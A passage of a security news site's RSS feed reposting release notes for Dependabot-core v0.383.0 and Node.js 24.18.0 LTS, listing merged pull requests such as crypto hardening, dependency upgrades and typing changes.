<li>Set default max branch name length to 100 characters by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4645181904" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15282" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15282/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15282">#15282</a></li>
<li>set temporary token for cargo auth that the proxy will then replace by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/brettfo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/brettfo">@brettfo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4651733757" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15298" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15298/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15298">#15298</a></li>
<li>Reject updates for private registries without proper dependabot configuration by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AbhishekBhaskar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AbhishekBhaskar">@AbhishekBhaskar</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4689723809" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15347" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15347/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15347">#15347</a></li>
<li>gradle: bump updater image to 9.4.1 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/thavaahariharangit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/thavaahariharangit">@thavaahariharangit</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4701555584" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15356" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15356/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15356">#15356</a></li>
<li>Bundler: tolerate empty registry checksum metadata in v4 helper by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4702902357" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15359" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15359/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15359">#15359</a></li>
<li>Preserve custom gradle-wrapper.properties values during wrapper updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671028417" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15336" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15336/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15336">#15336</a></li>
<li>fix(pre-commit, github-actions): use tag creation date for cooldown instead of commit date by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/robaiken/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/robaiken">@robaiken</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4691711310" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15350" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15350/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15350">#15350</a></li>
<li>Update Sorbet toolchain and regenerate gem RBIs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652795499" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15304" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15304/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15304">#15304</a></li>
<li>Enable six zero-offense Sorbet guardrail cops by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652948476" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15305" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15305/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15305">#15305</a></li>
<li>Replace to_hash with to_h and enable ImplicitConversionMethod by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652948732" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15306" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15306/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15306">#15306</a></li>
<li>Enforce method signatures via Sorbet/EnforceSignatures by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4652949147" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15307" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15307/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15307">#15307</a></li>
<li>Image content validation for manifest lists for container image updates by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jpinz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jpinz">@jpinz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4695234221" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15352" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15352/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15352">#15352</a></li>
<li>Type Version and Requirement internals across ecosystems by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721203118" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15379" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15379/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15379">#15379</a></li>
<li>Type RequirementsUpdater base and gradle/maven/sbt with DependencyRequirement by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721309063" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15380" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15380/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15380">#15380</a></li>
<li>Type standalone RequirementsUpdaters with DependencyRequirement by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721505213" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15381" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15381/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15381">#15381</a></li>
<li>Drop Python 3.9 support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kbukum1/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kbukum1">@kbukum1</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728157653" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15391" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15391/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15391">#15391</a></li>
<li>Stub docker manifest request in helm update_checker spec by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4729678690" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15398" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15398/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15398">#15398</a></li>
<li>Parse DependencyGroup rules into typed readers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4729573225" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15395" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15395/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15395">#15395</a></li>
<li>Type provider_metadata as integer-keyed by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/JamieMagee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/JamieMagee">@JamieMagee</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4729573621" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15396" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15396/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15396">#15396</a></li>
<li>Fix Swift native requirement parser when there are additional arguments in <code>.package()</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kkebo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kkebo">@kkebo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656860675" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15311" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15311/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15311">#15311</a></li>
<li>v0.383.0 by @dependabot-core-action-automation[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4712822309" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15365" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15365/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15365">#15365</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lucasmazza/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lucasmazza">@lucasmazza</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4613742805" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15249" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15249/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15249">#15249</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ajha-cs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ajha-cs">@ajha-cs</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4664826172" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15324" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15324/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15324">#15324</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kkebo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kkebo">@kkebo</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4656860675" data-permission-text="Title is private" data-url="https://github.com/dependabot/dependabot-core/issues/15311" data-hovercard-type="pull_request" data-hovercard-url="/dependabot/dependabot-core/pull/15311/hovercard" href="https://github.com/dependabot/dependabot-core/pull/15311">#15311</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/dependabot/dependabot-core/compare/v0.382.0...v0.383.0"><tt>v0.382.0...v0.383.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[2026-06-23, Version 24.18.0 'Krypton' (LTS), @richardlau prepared by @sxa]]></title>
<description><![CDATA[Notable Changes

[e07e7a31e1] - crypto: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) #63527
[44c8ebcbd6] - http: avoid stream listeners on idle agent sockets (Matteo Collina) #64004
[d3ef4122ee] - (SEMVER-MINOR) buffer: increase Buffer.poolSize default to 64 KiB (Matteo Collina) #...]]></description>
<link>https://tsecurity.de/de/3619855/downloads/2026-06-23-version-24180-krypton-lts-richardlau-prepared-by-sxa/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3619855/downloads/2026-06-23-version-24180-krypton-lts-richardlau-prepared-by-sxa/</guid>
<pubDate>Wed, 24 Jun 2026 01:16:44 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Notable Changes</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/e07e7a31e1"><code>e07e7a31e1</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63527/hovercard">#63527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/44c8ebcbd6"><code>44c8ebcbd6</code></a>] - <strong>http</strong>: avoid stream listeners on idle agent sockets (Matteo Collina) <a href="https://github.com/nodejs/node/pull/64004" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/64004/hovercard">#64004</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/d3ef4122ee"><code>d3ef4122ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>buffer</strong>: increase Buffer.poolSize default to 64 KiB (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63597" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63597/hovercard">#63597</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb2857b85a"><code>bb2857b85a</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: align key argument names in docs and error messages (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9d5e87880"><code>b9d5e87880</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: accept key data in crypto.diffieHellman() and cleanup DH jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ccd756d61e"><code>ccd756d61e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: add TurboSHAKE and KangarooTwelve Web Cryptography algorithms (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62183" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62183/hovercard">#62183</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4c9251fc09"><code>4c9251fc09</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>http</strong>: add writeInformation to send arbitrary 1xx status codes (Tim Perry) <a href="https://github.com/nodejs/node/pull/63155" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63155/hovercard">#63155</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8c989ec4a3"><code>8c989ec4a3</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>inspector</strong>: expose precise coverage start to JS runtime (sangwook) <a href="https://github.com/nodejs/node/pull/63079" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63079/hovercard">#63079</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3f54c8ba32"><code>3f54c8ba32</code></a>] - <em><strong>Revert</strong></em> "<strong>stream</strong>: noop pause/resume on destroyed streams" (Stewart X Addison) <a href="https://github.com/nodejs/node/pull/63834" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63834/hovercard">#63834</a></li>
</ul>
<h3>Commits</h3>
<ul>
<li>[<a href="https://github.com/nodejs/node/commit/d3ef4122ee"><code>d3ef4122ee</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>buffer</strong>: increase Buffer.poolSize default to 64 KiB (Matteo Collina) <a href="https://github.com/nodejs/node/pull/63597" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63597/hovercard">#63597</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/9ff36e40f0"><code>9ff36e40f0</code></a>] - <strong>build</strong>: add --enable-all-experimentals build flag (Paolo Insogna) <a href="https://github.com/nodejs/node/pull/62755" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62755/hovercard">#62755</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/7c22ee23aa"><code>7c22ee23aa</code></a>] - <strong>build</strong>: def <code>NODE_USE_NODE_CODE_CACHE</code> only used in node_mksnapshot (Chengzhong Wu) <a href="https://github.com/nodejs/node/pull/63588" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63588/hovercard">#63588</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2551abdb4a"><code>2551abdb4a</code></a>] - <strong>build,win</strong>: enable x64 PGO (Stefan Stojanovic) <a href="https://github.com/nodejs/node/pull/62761" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62761/hovercard">#62761</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e8a55ce9b1"><code>e8a55ce9b1</code></a>] - <strong>crypto</strong>: strengthen argument CHECKs in TurboSHAKE (Tobias Nießen) <a href="https://github.com/nodejs/node/pull/62763" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62763/hovercard">#62763</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ae61cd68f3"><code>ae61cd68f3</code></a>] - <strong>crypto</strong>: harden WebCrypto against prototype pollution (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3d05a1d396"><code>3d05a1d396</code></a>] - <strong>crypto</strong>: pass CryptoKey handles to KDF jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/f9d10a3f6b"><code>f9d10a3f6b</code></a>] - <strong>crypto</strong>: remove async from WebCrypto methods (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e431d93e9e"><code>e431d93e9e</code></a>] - <strong>crypto</strong>: add WebCrypto CryptoJob mode (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63363" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63363/hovercard">#63363</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/56e2505e48"><code>56e2505e48</code></a>] - <strong>crypto</strong>: wire ML-DSA and ML-KEM for use when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3bac77f2a8"><code>3bac77f2a8</code></a>] - <strong>crypto</strong>: wire ChaCha20-Poly1305 in Web Cryptography when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/1bff901b09"><code>1bff901b09</code></a>] - <strong>crypto</strong>: wire AES-KW in Web Cryptography when using BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63255" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63255/hovercard">#63255</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4433fca3df"><code>4433fca3df</code></a>] - <strong>crypto</strong>: harden CryptoKey algorithm slots (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b5cf01217a"><code>b5cf01217a</code></a>] - <strong>crypto</strong>: harden KeyObject internal slots (Filip Skokan) <a href="https://github.com/nodejs/node/pull/63111" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63111/hovercard">#63111</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ce84aef37d"><code>ce84aef37d</code></a>] - <strong>crypto</strong>: add guards and adjust tests for BoringSSL (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62883" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62883/hovercard">#62883</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/26781689b0"><code>26781689b0</code></a>] - <strong>crypto</strong>: reject duplicate ML-KEM JWK key_ops (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62905" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62905/hovercard">#62905</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/aeea8f4970"><code>aeea8f4970</code></a>] - <strong>crypto</strong>: add JWK support for ML-KEM and SLH-DSA key types (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62706" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62706/hovercard">#62706</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/407cf91656"><code>407cf91656</code></a>] - <strong>crypto</strong>: guard against size_t overflow on experimental 32-bit arch (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62626" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62626/hovercard">#62626</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/bb2857b85a"><code>bb2857b85a</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: align key argument names in docs and error messages (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b9d5e87880"><code>b9d5e87880</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: accept key data in crypto.diffieHellman() and cleanup DH jobs (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62527/hovercard">#62527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b46d52b283"><code>b46d52b283</code></a>] - <strong>crypto</strong>: unify asymmetric key import through KeyObjectHandle::Init (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62499" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62499/hovercard">#62499</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/ccd756d61e"><code>ccd756d61e</code></a>] - <strong>(SEMVER-MINOR)</strong> <strong>crypto</strong>: add TurboSHAKE and KangarooTwelve Web Cryptography algorithms (Filip Skokan) <a href="https://github.com/nodejs/node/pull/62183" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62183/hovercard">#62183</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/e07e7a31e1"><code>e07e7a31e1</code></a>] - <strong>crypto</strong>: update root certificates to NSS 3.123.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63527" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63527/hovercard">#63527</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/61826df455"><code>61826df455</code></a>] - <strong>crypto</strong>: coerce -0 keylen to +0 in pbkdf2 and scrypt (Jordan Harband) <a href="https://github.com/nodejs/node/pull/63531" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63531/hovercard">#63531</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/16d2fd3c07"><code>16d2fd3c07</code></a>] - <strong>crypto</strong>: align verifyOneShot accepted types (Anshika Jain) <a href="https://github.com/nodejs/node/pull/63280" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63280/hovercard">#63280</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3b8330deda"><code>3b8330deda</code></a>] - <strong>crypto</strong>: improve system certificate enumeration logic on macOS (Robo) <a href="https://github.com/nodejs/node/pull/62576" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62576/hovercard">#62576</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/141de35399"><code>141de35399</code></a>] - <strong>debugger</strong>: add --help to <code>node inspect</code> and improve docs (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63201" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63201/hovercard">#63201</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/b76bfcd4fa"><code>b76bfcd4fa</code></a>] - <strong>deps</strong>: upgrade npm to 11.16.0 (npm team) <a href="https://github.com/nodejs/node/pull/63602" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63602/hovercard">#63602</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/4ec142314c"><code>4ec142314c</code></a>] - <strong>deps</strong>: SQLite: cherry-pick b869ed6b067d623cb1383549f2a18aa35508385d (Junsu Han) <a href="https://github.com/nodejs/node/pull/63525" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63525/hovercard">#63525</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/19e8ce1c36"><code>19e8ce1c36</code></a>] - <strong>deps</strong>: upgrade npm to 11.15.0 (npm team) <a href="https://github.com/nodejs/node/pull/63463" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63463/hovercard">#63463</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/8a264260e2"><code>8a264260e2</code></a>] - <strong>deps</strong>: update sqlite to 3.53.1 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/63217" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63217/hovercard">#63217</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/50c8ff3f94"><code>50c8ff3f94</code></a>] - <strong>deps</strong>: update simdjson to 4.6.4 (Node.js GitHub Bot) <a href="https://github.com/nodejs/node/pull/62811" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/62811/hovercard">#62811</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/6e56f01c4b"><code>6e56f01c4b</code></a>] - <strong>deps</strong>: V8: cherry-pick 435a2cdf664c (Matthias Liedtke) <a href="https://github.com/nodejs/node/pull/63136" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63136/hovercard">#63136</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/3ba813b242"><code>3ba813b242</code></a>] - <strong>deps</strong>: cherry-pick <a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/libuv/libuv/commit/a43e543/hovercard" href="https://github.com/libuv/libuv/commit/a43e543">libuv/libuv@<tt>a43e543</tt></a> (Ali Hassan) <a href="https://github.com/nodejs/node/pull/63222" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63222/hovercard">#63222</a></li>
<li>[<a href="https://github.com/nodejs/node/commit/2390e3a5ac"><code>2390e3a5ac</code></a>] - <strong>doc</strong>: remove duplicated sentences in large-pull-requests.md (Joyee Cheung) <a href="https://github.com/nodejs/node/pull/63650" data-hovercard-type="pull_request" data-hovercard-url="/nodejs/node/pull/63650/hovercard">#63650</a></li>
